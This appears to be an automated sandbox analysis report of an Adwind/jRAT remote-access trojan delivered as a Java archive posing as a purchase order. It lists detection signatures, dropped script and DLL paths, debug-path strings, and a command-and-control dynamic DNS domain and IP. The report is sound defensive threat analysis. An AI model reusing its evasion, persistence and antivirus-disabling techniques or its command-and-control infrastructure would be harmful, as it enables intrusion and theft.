Windows Analysis Report
NewOrder - P2D041197.jar

Overview

General Information

Sample name: NewOrder - P2D041197.jar
Analysis ID: 1427166
MD5: bc34f4e23dca52ed6425b46a3dcf5e95
SHA1: e82affa4fea489146e3deb803efdb561a394073f
SHA256: f77617921c5fb6f8114eca9fe330b8d2bfc3a99c4f581f3f9a8282a31d528aeb
Tags: Adwindjar
Infos:

Detection

ADWIND
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Detected ADWIND Rat
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Yara detected AdWind RATs dll
Creates a Image File Execution Options (IFEO) Debugger entry
Creates an undocumented autostart registry key
Disable UAC(promptonsecuredesktop)
Disables UAC (registry)
Disables Windows system restore
Disables zone checking for all users
Excessive usage of taskkill to terminate processes
Exploit detected, runtime environment starts unknown processes
Java source code contains strings found in CrossRAT
Sigma detected: Adwind RAT / JRAT File Artifact
Sigma detected: Potential Attachment Manager Settings Associations Tamper
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Processes Spawned by Java.EXE
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses dynamic DNS services
Uses regedit.exe to modify the Windows registry
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Add executable type to lowriskfiletypes to avoid warning prompt
Binary contains a suspicious time stamp
Changes image file execution options
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Internet Provider seen in connection with other malware
PE file contains sections with non-standard names
PE file does not import any functions
Queries the installed Java version
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Shell Process Spawned by Java.EXE
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara signature match

Classification

AV Detection
barindex
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Retrive4614601071766058238.vbs Avira: detection malicious, Label: VBS/Antiav.jre
Source: C:\Users\user\AppData\Local\Temp\Retrive6937263458449411198.vbs Avira: detection malicious, Label: VBS/Agent.281
Source: C:\Users\user\AppData\Local\Temp\Retrive4410908985771939559.vbs Avira: detection malicious, Label: VBS/Agent.281
Source: C:\Users\user\AppData\Local\Temp\Windows6471774156078736222.dll Avira: detection malicious, Label: TR/Spy.Agent.lusda
Source: C:\Users\user\AppData\Local\Temp\Retrive508991219844214216.vbs Avira: detection malicious, Label: VBS/Antiav.jre
Multi AV Scanner detection for domain / URL
Source: pnauco5.ddns.net Virustotal: Detection: 5% Perma Link
Source: https://jrat.io Virustotal: Detection: 6% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Windows6471774156078736222.dll ReversingLabs: Detection: 85%
Source: C:\Users\user\AppData\Local\Temp\Windows6471774156078736222.dll Virustotal: Detection: 79% Perma Link
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\README.txt
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME-JAVAFX.txt
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME-JAVAFX.txt
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME.txt
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME.txt
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: xcopy.exe, 00000015.00000003.1699563884.00000000004DD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\ktab_objs\ktab.pdb source: xcopy.exe, 00000015.00000003.1726602349.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\pack200_objs\pack200.pdb source: xcopy.exe, 00000015.00000003.1728816995.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\hotspot\windows_i486_compiler1\product\jvm.pdbi source: xcopy.exe, 00000015.00000003.1738221314.000000000277F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\Windows10\Desktop\RetriveTitle\x64\Release\TitleWindow.pdb source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\Windows10\Desktop\RetriveTitle\x64\Release\TitleWindow.pdb source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\npjp2\obj\npjp2.pdb source: xcopy.exe, 00000015.00000003.1740826743.00000000004E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjfr\jfr.pdb source: xcopy.exe, 00000015.00000003.1705497311.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\tnameserv_objs\tnameserv.pdb source: xcopy.exe, 00000015.00000003.1731847868.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libnet\net.pdb.. source: xcopy.exe, 00000015.00000003.1728367082.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libzip\zip.pdb** source: xcopy.exe, 00000015.00000003.1734516541.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libt2k\t2k.pdb source: xcopy.exe, 00000015.00000003.1731847868.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\Windows10\Desktop\CryptUtil_DLL_Visual Studio 10\Release\CryptUtil.pdb source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.0000000005052000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.000000000502A000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libnio\nio.pdb source: xcopy.exe, 00000015.00000003.1728367082.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libsplashscreen\splashscreen.pdbjj source: xcopy.exe, 00000015.00000003.1730677156.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libzip\zip.pdb source: xcopy.exe, 00000015.00000003.1734516541.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libverify\verify.pdb source: xcopy.exe, 00000015.00000003.1733614981.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjsdt\jsdt.pdb source: xcopy.exe, 00000015.00000003.1725315701.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libj2pkcs11\j2pkcs11.pdb source: xcopy.exe, 00000015.00000003.1703628681.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java-rmi_objs\java-rmi.pdb source: xcopy.exe, 00000015.00000003.1703805489.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjaas\jaas_nt.pdb source: xcopy.exe, 00000015.00000003.1703628681.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libj2pcsc\j2pcsc.pdb source: xcopy.exe, 00000015.00000003.1703452847.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: xcopy.exe, 00000015.00000003.1698710106.00000000004DC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jabswitch\jabswitch.pdb source: xcopy.exe, 00000015.00000003.1703719180.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\Windows10\Desktop\CryptUtil_DLL_Visual Studio 10\x64\Release\CryptUtil.pdb source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.0000000005000000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.000000000502A000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libkrb5\w2k_lsa_auth.pdb source: xcopy.exe, 00000015.00000003.1733614981.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\hotspot\windows_i486_compiler1\product\jvm.pdb source: xcopy.exe, 00000015.00000003.1738221314.000000000277F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: d:\a01\_work\38\s\\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: xcopy.exe, 00000015.00000003.1741105307.00000000004E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjawtaccessbridge-32\JAWTAccessBridge-32.pdb source: xcopy.exe, 00000015.00000003.1705281833.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jabswitch\jabswitch.pdb,,+ source: xcopy.exe, 00000015.00000003.1703719180.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: xcopy.exe, 00000015.00000003.1700108241.00000000004DD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libj2gss\j2gss.pdb source: xcopy.exe, 00000015.00000003.1703452847.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjawt\jawt.pdb source: xcopy.exe, 00000015.00000003.1705197619.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\tnameserv_objs\tnameserv.pdb source: xcopy.exe, 00000015.00000003.1731847868.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\ktab_objs\ktab.pdb source: xcopy.exe, 00000015.00000003.1726602349.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libsspi_bridge\sspi_bridge.pdb source: xcopy.exe, 00000015.00000003.1730677156.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java-rmi_objs\java-rmi.pdb source: xcopy.exe, 00000015.00000003.1703805489.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\liblcms\lcms.pdb source: xcopy.exe, 00000015.00000003.1727080708.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: xcopy.exe, 00000015.00000003.1698710106.00000000004DC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libj2pkcs11\j2pkcs11.pdb## source: xcopy.exe, 00000015.00000003.1703628681.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\liblcms\lcms.pdb11 source: xcopy.exe, 00000015.00000003.1727080708.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjsoundds\jsoundds.pdb source: xcopy.exe, 00000015.00000003.1725756466.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libdt_socket\dt_socket.pdb source: xcopy.exe, 00000015.00000003.1701984344.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libmanagement\management.pdb&& source: xcopy.exe, 00000015.00000003.1727080708.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\orbd_objs\orbd.pdb source: xcopy.exe, 00000015.00000003.1728482839.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjsound\jsound.pdb## source: xcopy.exe, 00000015.00000003.1725508853.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libnpt\npt.pdb source: xcopy.exe, 00000015.00000003.1728367082.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\pack200_objs\pack200.pdb source: xcopy.exe, 00000015.00000003.1728816995.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\npjp2\obj\npjp2.pdbEE, source: xcopy.exe, 00000015.00000003.1740826743.00000000004E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: xcopy.exe, 00000015.00000003.1700293859.00000000004DD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\Win10\Desktop\RetriveTitle_vb2010\Release\TitleWindow.pdb source: javaw.exe, 00000006.00000002.2857437082.0000000073A98000.00000002.00000001.01000000.0000000A.sdmp, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A707000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libsplashscreen\splashscreen.pdb source: xcopy.exe, 00000015.00000003.1730677156.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: xcopy.exe, 00000015.00000003.1699288851.00000000004DD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\orbd_objs\orbd.pdb source: xcopy.exe, 00000015.00000003.1728482839.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libt2k\t2k.pdb:: source: xcopy.exe, 00000015.00000003.1731847868.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libnio\nio.pdb'' source: xcopy.exe, 00000015.00000003.1728367082.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libnet\net.pdb source: xcopy.exe, 00000015.00000003.1728367082.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjsound\jsound.pdb source: xcopy.exe, 00000015.00000003.1725508853.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libmanagement\management.pdb source: xcopy.exe, 00000015.00000003.1727080708.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\Windows10\Desktop\CryptUtil_DLL_Visual Studio 10\Release\CryptUtil.pdbP8PP@Y source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.0000000005052000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.000000000502A000.00000004.00000800.00020000.00000000.sdmp

Software Vulnerabilities
barindex
Exploit detected, runtime environment starts unknown processes
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Process created: C:\Windows\SysWOW64\wscript.exe

Networking
barindex
Uses dynamic DNS services
Source: unknown DNS query: name: pnauco5.ddns.net
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.4:49739 -> 103.151.123.225:5000
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown DNS traffic detected: queries for: pnauco5.ddns.net
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/
Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/3
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/allow-java-encodings
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/allow-java-encodingsorg/a9
Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/allow-java-encodingsxA
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/continue-after-fatal-error
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/continue-after-fatal-errors/inter=
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1723780631.0000000015BBC000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852025567.0000000015BC3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/create-cdata-nodes
Source: javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/create-cdata-nodeszs
Source: java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/disallow-doctype-decl
Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1723780631.0000000015BBC000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852025567.0000000015BC3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/dom/create-entity-ref-nodes
Source: java.exe, 00000007.00000003.1723780631.0000000015BBC000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852025567.0000000015BC3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/dom/create-entity-ref-nodes?
Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/dom/defer-node-expansion
Source: javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/dom/defer-node-expansion9
Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1723780631.0000000015BBC000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852025567.0000000015BC3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/dom/include-ignorable-whitespace
Source: javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/dom/include-ignorable-whitespace/
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/g3
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/generate-synthetic-annotations
Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/generate-synthetic-annotations9
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/generate-synthetic-annotationsmen9
